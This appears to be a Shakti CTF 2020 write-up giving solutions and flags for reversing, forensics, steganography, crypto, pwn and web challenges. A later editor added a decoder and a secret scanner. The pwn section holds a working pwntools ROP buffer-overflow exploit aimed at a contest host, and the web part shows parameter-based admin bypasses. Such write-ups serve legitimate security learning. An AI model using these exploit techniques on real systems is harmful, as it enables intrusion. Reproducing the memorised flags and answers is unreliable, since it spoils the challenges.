Shakti CTF 2020 Memo

Reversing

Just-Run-It!

Do you know how to run a binary in linux?

Just run it.

~/ctf/Shakti CTF ᐅ ./run 
Here's your flag! : shaktictf{and_that's_how_you_run_a_linux_binary!}
FLAG : shaktictf{and_that's_how_you_run_a_linux_binary!}

PYthn

Familiar with python?
Z=[]
k=[]
Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6"
def Fun(inp):
    st=[]
    for i in range (len(inp)):
        st.append(chr(ord(inp[i])^1))
    return(''.join(st))
def FuN(inp):
    for i in range(len(inp)):
        if(i<11):
            Z.append(chr(ord(inp[i])+i+5))
        else:
            Z.append(chr(ord(inp[i])+4))      
    return(''.join(Z))
def fuN(text,s): 
    result = "" 
    for i in range(len(text)): 
        char = text[i] 
        if(char.isnumeric()):
            result+=(chr(ord(char)-1))
        elif(char.isupper()): 
            result += chr((ord(char) + s-65) % 26 + 65) 
        else: 
            result+=(chr(ord(char)^1))
    return result 
X=input("Enter input:")
k=FuN(Fun(X))
if(Q!=k):
    print("NO")
else:
    print("Flag: shaktictf{"+X+"}")

solve.py

Z=[]

Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6"

def Fun(inp):
    st=[]
    for i in range (len(inp)):
        st.append(chr(ord(inp[i])^1))
    return(''.join(st))

def FuN(inp):
    for i in range(len(inp)):
        if(i<11):
            Z.append(chr(ord(inp[i])-i-5))
        else:
            Z.append(chr(ord(inp[i])-4))      
    return(''.join(Z))

print(Fun(FuN(Q)))
~/ctf/Shakti CTF/PYthn ᐅ python3 solve.py
G00d!_c0nTinUe_Expl0r1nG_Mor3
FLAG : shaktictf{G00d!_c0nTinUe_Expl0r1nG_Mor3}

Damez

Oops! There was a sudden crash on Margret's system. She's afraid that she lost the passcode which she needs in urgency for running a simple prog which hopefully was backed up. Could you figure out the passcode and run the program successfully.

Opening the binary in IDA showed the flag.

FLAG : shaktictf{K33p_th3_gam3_g0ing_gurl!}

Forensics

Shark on Wire

Lara sent me a file which had some hidden message. Help me recover the secret information.

View it in Wireshark.

FLAG : shaktictf{wir3sh4rk_i5_ju5t_aw3s0m3}

Not That Easy

We have intercepted the communication between two criminals and we found that they had shared a secret information. Can you find out the secret?

There is a PNG. Save it as raw.

FLAG : shaktictf{sh3_w4s_h0n0r3d_by_3lectr0nic_fr0nti3r_f0und4ti0n}

Steganography

Hidd3n

##############################
########## exiftool ##########
##############################
ExifTool Version Number         : 10.40
File Name                       : image.jpg
Directory                       : .
File Size                       : 44 kB
File Modification Date/Time     : 2020:12:04 18:21:00+00:00
File Access Date/Time           : 2020:12:05 05:05:46+00:00
File Inode Change Date/Time     : 2020:12:05 05:05:42+00:00
File Permissions                : rw-------
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : cGFzc3BocmFzZT1qdTV0ZmluZG0z
Image Width                     : 800
Image Height                    : 600
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 800x600
Megapixels                      : 0.480
$ echo cGFzc3BocmFzZT1qdTV0ZmluZG0z | base64 -d
passphrase=ju5tfindm3
root@3a8a801b9951:/data# steghide extract -sf image.jpg 
Enter passphrase: ju5tfindm3
wrote extracted data to "flag.txt".
"In engineering, the point is to get the job done, and people are happy to help. You should be generous with credit, and you should be happy to help others." Who am I?

Here is your flag: shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}
FLAG : shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}

Cryptography

3,2,1..Go

Introducing our theme woman : "Joan Clarke!" Cipher : WEQEXFTUXQHVOUFPSVLPTORHAFBQE

Looks like I found something I shouldn't have. Separate the words by underscores('_ ') and submit everything in lowercase around the flag format

Decrypt the Enigma cipher using the config as a reference.

FLAG : shaktictf{you_have_cracked_the_enigma_genius}

Easy Encoding

Joan knows this is breakable. Do you know how?

01001110 01111010 01001101 00110010 01001111 01000100 01011001 01111000 01001110 01101101 01001001 00110011 01001110 01000100 01011001 00110101 01001110 01101010 01001101 00110011 01001110 01000100 01011001 00110010 01001110 00110010 01001001 00110001 01001110 01111010 01001101 00110000 01001110 01111010 01001001 00110010 01011010 01000100 01010101 00110001 01001110 01111010 01000001 00110001 01011010 01101010 01010001 01111010 01001110 01101010 01100111 01111010 01001110 01000100 01011010 01101010 01001110 01101101 01001101 01111010 01001101 01111010 01011010 01101100 01001110 01101010 01100011 01111010 01001101 01111010 01100100 01101011

Decode in this order: from binary, Base64, hex.

FLAG : shaktictf{W4rmUp_Ch4ll3ng3}
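
The same binary, Base64, hex chain can be peeled in a script. This is an added example, not part of the original write-up; `peel_layer` and `peel_all` are hypothetical helper names, and the layer detection is a heuristic that goes beyond this one challenge by recognising each encoding from its alphabet and stopping when nothing matches.

```python
import base64
import re

# Ciphertext copied from the challenge text above.
CIPHERTEXT = "01001110 01111010 01001101 00110010 01001111 01000100 01011001 01111000 01001110 01101101 01001001 00110011 01001110 01000100 01011001 00110101 01001110 01101010 01001101 00110011 01001110 01000100 01011001 00110010 01001110 00110010 01001001 00110001 01001110 01111010 01001101 00110000 01001110 01111010 01001001 00110010 01011010 01000100 01010101 00110001 01001110 01111010 01000001 00110001 01011010 01101010 01010001 01111010 01001110 01101010 01100111 01111010 01001110 01000100 01011010 01101010 01001110 01101101 01001101 01111010 01001101 01111010 01011010 01101100 01001110 01101010 01100011 01111010 01001101 01111010 01100100 01101011"


def peel_layer(text):
    """Decode one recognised layer; return (name, decoded_text) or None."""
    compact = "".join(text.split())
    try:
        # Order matters: a 0/1 string is also valid hex, and hex is also valid Base64.
        if re.fullmatch(r"[01]+", compact) and len(compact) % 8 == 0:
            name, raw = "binary", int(compact, 2).to_bytes(len(compact) // 8, "big")
        elif re.fullmatch(r"[0-9a-fA-F]+", compact) and len(compact) % 2 == 0:
            name, raw = "hex", bytes.fromhex(compact)
        elif re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact) and len(compact) % 4 == 0:
            name, raw = "base64", base64.b64decode(compact, validate=True)
        else:
            return None
        # A layer only counts if it yields ASCII text; otherwise stop peeling.
        return name, raw.decode("ascii")
    except ValueError:
        return None


def peel_all(text, max_layers=10):
    """Peel layers until no encoding is recognised; return (layer_names, text)."""
    layers = []
    for _ in range(max_layers):
        step = peel_layer(text)
        if step is None:
            break
        name, text = step
        layers.append(name)
    return layers, text


if __name__ == "__main__":
    print(peel_all(CIPHERTEXT))
```
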

Ancient Warfare

rot13

Do you know how people from Caesar's time used to send encrypted messages?

Try to get the flag : funxgvpgs{byq3e_1f_a0g_nyj4lf_gu3_o3gg3e!}
FLAG : shaktictf{old3r_1s_n0t_alw4ys_th3_b3tt3r!}

SimpleRSA

Here's the secret message from Joan to you. Break it and Read it.
Here's a simple RSA challenge for you. 
n = 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761L
e = 65537
c = 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
~/tools/RsaCtfTool (master ✘)✭ ᐅ python3 RsaCtfTool.py -n 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761 -e 65537 --uncipher 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
[+] Clear text : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}'
FLAG : shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}

Pwn

Connect

Your adventure begins here to help the renowned Computer Scientist Kathleen Booth to get across the challenges and win the race. Cross the gates and enter into the arena!

Just connect.

~/ctf/Shakti CTF ᐅ nc 34.72.218.129 1111
You have successfully connected to our service!
To get your flag, please enter the appropriate bash commands.
cat flag.txt
shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}
FLAG : shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}

Adventure Chain

Kathleen is on her next adventure, which marked her name in history of Computer Science forever. Looks like the pieces of her ARC code seem to be brewing something notorious. Follow the chains which might lead you to a hideous place where you can claim your mastery and discover the unintended invention.

gdb-peda$ patto AA0AAFAAbA
AA0AAFAAbA found at offset: 40

The offset to RIP is 40.

The flag function requires the condition if ( password == 0x1337 && admin_val == 0xCAFEBABE && a1 == 0xDEADC0DE && a2 == 0xDEAD10CC ) to hold. The assert function sets password.

__int64 __noreturn assert()
{
  password = 0x1337;
  return 0LL;
}

The setValue function can set admin_val. Use pop rdi; ret; to pass 0xDEADBEEF as the first argument.

__int64 __fastcall setValue(int a1)
{
  if ( password != 0x1337 || a1 != 0xDEADBEEF )
    puts("Oops no :(");
  else
    admin_val = 0xCAFEBABE;
  return 0LL;
}

After that, build the ROP chain so that the flag function is called with 0xDEADC0DE as the first argument and 0xDEAD10CC as the second.

import sys

from pwn import *

binary = "./chall"
host ="34.72.218.129"
port = 4444

elf = ELF(binary)
context.binary = binary
context.log_level = "info"

commands = """
continue
"""

if len(sys.argv) >= 2 and sys.argv[1] == "r":
    # remote
    s = remote(host, port)
elif len(sys.argv) >= 2 and sys.argv[1] == "d":
    # debug
    s = gdb.debug(binary, commands)
    # libc = elf.libc
else:
    # local
    s = process(binary)
    # libc = elf.libc

pop_rdi = next(elf.search(asm("pop rdi; ret")))
pop_rsi_r15 = next(elf.search(asm("pop rsi ; pop r15 ; ret")))

s.sendlineafter(b">> ", b"1")

payload = b"A"*40
payload += p64(elf.sym["assert"])
payload += p64(pop_rdi)
payload += p64(0xDEADBEEF)
payload += p64(elf.sym["setValue"])
payload += p64(pop_rdi)
payload += p64(0xDEADC0DE)
payload += p64(pop_rsi_r15)
payload += p64(0xDEAD10CC)
payload += p64(0)
payload += p64(elf.sym["flag"])

s.sendlineafter(b"Enter your name:\n", payload)

sleep(1)
s.interactive()
~/ctf/Shakti CTF/Adventure Chain ᐅ python3 exploit.py r
[*] '/home/user/ctf/Shakti CTF/Adventure Chain/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 34.72.218.129 on port 4444: Done
[*] Switching to interactive mode
Mischief managed...
Here is your flag:
shaktictf{r0pe_climbing_chaining_1337_way}
[*] Got EOF while reading in interactiv
FLAG : shaktictf{r0pe_climbing_chaining_1337_way}

Web

Biscuits

Ada Lovelace used to love eating french biscuits during her work

The flag is in a cookie.

URL-decode it.

FLAG : shaktictf{c00k13s_m4k3_phr3n0l0gy&m3sm3r15m_3asy}

Machine

Babbage was impressed by Lovelace's intellect and analytic skills that he called her a humanoid

Look at robots.txt.

~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/robots.txt
User-agent: *
Allow: /var/www/html/
Disallow: /mkiujnbhytgbvfr.html

~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/mkiujnbhytgbvfr.html
shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}
FLAG : shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}

Ador

Ada was born on 10 December 1815 not 12, identification change makes a difference

Apparently the secret is visible if you are admin.

Checking the source, there appears to be a user parameter.

~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://104.198.67.251/Ador/\?name\=admin 
Welcome Admin, here is the secret shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}
FLAG : shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}

AuthEN

Ada is important to the world, she is important for a reason

The password is in the page source.

<script>
$(".c_submit").click(function(event) {
    event.preventDefault()
    var email = $("#cuser").val();
    var password = $("#cpass").val();
    if(username == "admin" && password == String.fromCharCode(115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125)) {
        if(document.location.href.indexOf("?password=") == -1) {
            document.location = document.location.href + "?password=" + password;
        }
    } else {
        $("#cresponse").html("<div class='alert alert-danger'>Wrong password sorry.</div>");
    }
})
</script>

s = [115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125]
flag = ""
for c in s:
    flag += chr(c)
print(flag)
~/ctf/Shakti CTF ᐅ python3 solve.py 
shaktictf{b3y0nd_pur3_c4lculati0ns}
FLAG : shaktictf{b3y0nd_pur3_c4lculati0ns}
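
From a code-review angle, a credential compared in client-side script is readable by anyone who views the source, and hiding it behind String.fromCharCode does not change that. The following added example (not part of the original write-up) generalises the solve script into a check that scans JavaScript source for such calls with literal arguments; `find_charcode_secrets` is a hypothetical helper name and `SAMPLE_JS` is a constructed sample built from the script above.

```python
import re

# Constructed sample: the credential check from the challenge page's script
# (straight quotes), plus one call whose arguments are not literals.
SAMPLE_JS = """\
var password = $("#cpass").val();
if(username == "admin" && password == String.fromCharCode(115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125)) {
  document.location = document.location.href + "?password=" + password;
}
var label = String.fromCharCode(prefix, code);
"""

PATTERN = re.compile(
    r"(?:(?P<lhs>[\w.$]+)\s*={2,3}\s*)?"         # optional "<name> ==" before the call
    r"String\.fromCharCode\((?P<args>[^()]*)\)"  # the call and its raw argument list
)


def find_charcode_secrets(source):
    """Return (line, compared_name, decoded_text) for every
    String.fromCharCode call whose arguments are all numeric literals."""
    findings = []
    for m in PATTERN.finditer(source):
        try:
            # int(x, 0) accepts decimal and 0x.. literals; names and
            # expressions raise ValueError and are skipped.
            text = "".join(chr(int(a.strip(), 0)) for a in m.group("args").split(","))
        except ValueError:
            continue
        line = source.count("\n", 0, m.start()) + 1
        findings.append((line, m.group("lhs"), text))
    return findings


if __name__ == "__main__":
    for line, name, text in find_charcode_secrets(SAMPLE_JS):
        print(f"line {line}: {name or '<expression>'} compared with {text!r}")
```

A non-empty `compared_name` marks the literal as one side of an equality test, which is the pattern worth flagging in review; the durable fix is to verify the password on the server.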